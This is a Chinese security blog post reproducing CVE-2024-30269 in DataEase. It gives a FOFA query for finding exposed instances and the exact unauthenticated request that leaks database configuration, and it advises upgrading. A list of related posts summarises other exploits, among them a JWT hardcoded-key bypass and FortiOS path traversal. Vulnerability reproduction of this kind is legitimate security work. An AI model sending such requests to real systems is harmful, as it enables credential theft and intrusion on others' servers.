【漏洞复现】DataEase 数据库配置信息泄露漏洞(CVE-2024-30269)

最新推荐文章于 2025-05-06 23:18:48 发布
最新推荐文章于 2025-05-06 23:18:48 发布
阅读量668 收藏 3
点赞数 5
分类专栏: 漏洞复现 文章标签: 1024程序员节 网络安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_46381222/article/details/143214316
版权

免责声明

请勿使用本文中提到的技术进行非法测试或行为。使用本文中提供的信息或工具所造成的任何后果和损失由使用者自行承担,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、简介

DataEase是开源的数据可视化分析工具,帮助用户快速分析数据并洞察业务趋势,从而实现业务的改进与优化。

二、漏洞描述

接口/de2api/engine/getEngine处存在数据库配置信息泄露漏洞。

三、fofa语法

body="Dataease"

四、漏洞影响范围

版本2.5.0之前

五、漏洞复现

GET /de2api/engine/getEngine;.js HTTP/1.1
Host: ip

在这里插入图片描述
批量探测是否存在该漏洞
在这里插入图片描述

六、修复建议

更新当前系统或软件至最新版

原文始发于微信公众号(白帽攻防):【漏洞复现】DataEase 数据库配置信息泄露漏洞(CVE-2024-30269)

Palo Alto Networks PAN-OS身份认证绕过导致RCE漏洞
ZeroDay001的博客
11-21 198
Palo Alto Networks PAN-OS身份认证绕过导致RCE漏洞这是一个集内容管理与发布于一体的智能平台,广泛服务于新闻媒体及内容创作行业。平台支持多端协同和多渠道分发,拥有素材管理、内容编辑、智能审核等核心功能,并通过技术辅助创作与数据分析,显著提升内容生产效率与传播质量。从内容采集到发布实现全流程覆盖,优化工作流程,提高传播的精准度和时效性,帮助用户在数字化内容生态中实现高效协作与影响力扩展。
DataEase 数据库配置信息泄露复现(CVE-2024-30269)
iSee857的博客
09-27 630
在版本2.5.0之前存在数据库配置信息暴露漏洞。通过浏览器访问/de2api/engine/getEngine;.js路径可以获取平台的数据库配置。该漏洞已在v2.5.0中修复,除了升级之外,没有已知的解决方法。(github.com/dataease)是一款开源的数据可视化分析工具,可以帮助用户快速分析业务数据并洞察其趋势,为企业的业务改进与优化提供支持。DataEase
DataEase存在数据库配置信息暴露漏洞(CVE-2024-30269)
qq_43540348的博客
03-07 146
DataEase是一款由杭州飞致云信息科技有限公司推出的开源数据可视化分析工具,旨在帮助用户快速分析数据并洞察业务趋势,以实现业务的改进与优化。DataEase作为开源项目,用户可以在社区中交流经验、获取帮助和分享插件。产品线上快速获取和安装,快速获取用户反馈并按月发布新版本,持续优化产品功能和性能。操作界面简单直观,无需编程知识。用户通过鼠标点击和拖拽等简单操作即可完成数据分析和可视化的过程。基于Apache Doris实现,DataEase能够在超大数据量下实现秒级查询返回延时,提高数据分析的效率。
DataEase SQL注入漏洞 (CVE-2022-34114)
weixin_68999845的博客
07-21 1293
CVE-2022-34114漏洞搭建及复现
DataEase jwt硬编码任意登录漏洞复现CVE-2024-52295)(附脚本)
iSee857的博客
01-06 599
‌是一款开源的数据可视化分析工具,旨在帮助用户快速分析数据并洞察业务趋势,从而实现业务的改进与优化。DataEase支持丰富的数据源连接,能够通过拖拉拽方式快速制作图表,并方便地与他人分享‌。DataEase
漏洞预警|Dataease SQL注入漏洞
LJQClqjc的博客
07-28 584
近日网上有关于开源项目Dataease SQL注入漏洞 ,棱镜七彩威胁情报团队第一时间探测到,经分析研判,向全社会发起开源漏洞预警公告,提醒相关安全团队及时响应。
飞致云DataEase JWT硬编码身份认证绕过漏洞复现(CVE-2024-52295)
0xSec
01-05 979
DataEase是一个开源的数据可视化分析工具。DataEase 存在JWT硬编码身份认证绕过漏洞,未授权的远程攻击者可利用该漏洞绕过身份认证直接接管系统后台,结合后台各种反序列化和功能可以实现 RCE。获取服务器权限。
Craft CMS generate-transform接口存在远程命令执行漏洞CVE-2025-32432 附POC
最新发布
nnn2188185的博客
05-06 113
微信公众号搜索:南风漏洞复现文库该文章 南风漏洞复现文库 公众号首发Craft CMS。
CVE-2024-30269 DataEase配置信息泄露
一个努力学习网安的小牛马
10-18 434
DataEase是一个开源的数据可视化分析工具,可以连接本地的数据库,在/de2api/engine/getEngine;.js处纯在敏感信息泄露漏洞。本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任。>DataEase 2.5.0版本。
数据库信息泄漏 不可忽视的安全短板
weixin_33742618的博客
09-01 1894
一、 概述 传统的信息安全解决方案主要是通过网络传输通道加密、PKI或增强身份认证、防火墙、IPS、堡垒机等技术构成综合的信息安全应对策略,但这些方案在现实中变得弱不禁风,大量信息泄露事件频繁爆发。 图1 Verizon2014数据泄露事件 2014年数据泄漏调查报告中回顾了63737起赛博安全事件和1367起已经确认的数据泄露事件(赛博含义理解为:敏...
信息泄露漏洞记录
baidu_38844729的博客
12-03 631
svn源代码泄露 漏洞成因:SVN是源代码版本管理软件,开发人员在服务器上布署代码时,如果使用 svn checkout 功能来更新代码,而没有配置好目录访问权限,则会存在此漏洞 检测工具:https://github.com/admintony/svnExploit 漏洞危害:攻击者可以下载网站源代码,从wc.db获取敏感信息 漏洞修复: 删除/.svn 文件夹 禁止访问 /.svn 目录 git信息泄露 漏洞成因:开发人员使用git进行版本控制,对站点自动部署。如果将.git文件夹直接部署到线上环
漏洞复现】泛微ecology OA系统某接口存在数据库配置信息泄露漏洞
热门推荐
Summer's blog
05-13 1万+
泛微ecology OA系统某接口存在数据库配置信息泄露漏洞,复现的时候踩到的那些坑!经验分享与总结。
敏感信息泄露漏洞
夜行者的博客
02-21 7314
系统暴露系统内部信息,如网站绝对路径、网页源代码、SQL语句、中间件版本和程序异常等信息。数据库的敏感信息泄露数据库表段等信息泄露),攻击者可能利用此缺陷对客户端或服务器发送特殊构造的数据,发出攻击,从而了解后台数据库表等信息,对系统安全构成威胁。通过系统暴露出的异常信息,便于入侵者了解系统框架及代码等,从而加大系统被侵入的风险 解决方案: 1.对用户输入的异常字符做过滤,防止网站绝对路径、网页源代码和SQL语句等信息输出。 2.屏蔽应用程序报错回显,防止恶意用户获得服务器的敏感信息,或对出错信息进
GoAhead Web服务器远程命令执行漏洞CVE-2017-17562)漏洞复现
Amdy_amdy的博客
09-26 3662
一、漏洞概述: 1、漏洞简介: GoAhead Web Server,它是一个开源(商业许可)、简单、轻巧、功能强大、可以在多个平台运行的嵌入式Web Server。 GoAhead Web Server是跨平台的服务器软件,可以稳定地运行在Windows,Linux和Mac OS X操作系统之上。GoAhead Web Server是开放源代码的,这意味着你可以随意修改Web服务器的功能。...
weblogic-cve_2020_2555漏洞复现
0day
01-28 2062
weblogic-cve_2020_2555漏洞复现 漏洞概述: 该漏洞于2020年1月在网上爆出,属于weblogic反序列化漏洞漏洞原因是Oracle Fusion中间件 Oracle Coherence 存在缺陷,攻击者可利用该漏洞在未经授权下通过构造T3协议请求,获取 Weblogic 服务器权限,执行任意命令。 漏洞复现: Vulfocus平台拉取下载启动漏洞镜像环境: 访问漏洞环境地址端口11317,该端口映射在weblogic的服务端口7001,在url地址栏输入ip端口后添加
Fortinet FortiOS 路径遍历漏洞(CVE-2018-13379)
mei_13的博客
07-08 4535
1 漏洞简介 早在2019年5月24日,飞塔官方就发布了CVE-2018-13379漏洞安全公告,但直到8月份才有漏洞Exp流出,导致漏洞蔓延。 据官方介绍,CVE-2018-13379是SSL VPN中的一个目录遍历漏洞,该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素,导致攻击者可利用该漏洞访问受限目录之外的文件。 受影响的版本: FortiOS/5.6.3 ~ 5.6.7、FortiOS/6.0.0 ~ 6.0.4 2 环境搭建 使用FOFA中搜索飞塔SSL VPN服务器,
Python爬虫爬取Fofa中的url
weixin_50464560的博客
03-19 1174
Python3爬虫爬取Fofa中的urlPython3爬虫实战F5 BIG-IP TMUI(CVE-2020-5902)远程代码执行漏洞 一、漏洞简述 F5 BIG-IP 是美国F5公司一款集成网络流量管理、web应用防火墙、web网关、负载均衡等功能的应用交付平台。 前不久F5官方公布了在流量管理用户界面(TMUI)配置实用程序的特定页面中存在一处远程代码执行漏洞。攻击者可以利用该漏洞构造恶意请求,造成任意Java 代码执行,进而控制 F5 BIG-IP 的全部功能,包括但不限于: 执行任意系统命令、开启
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值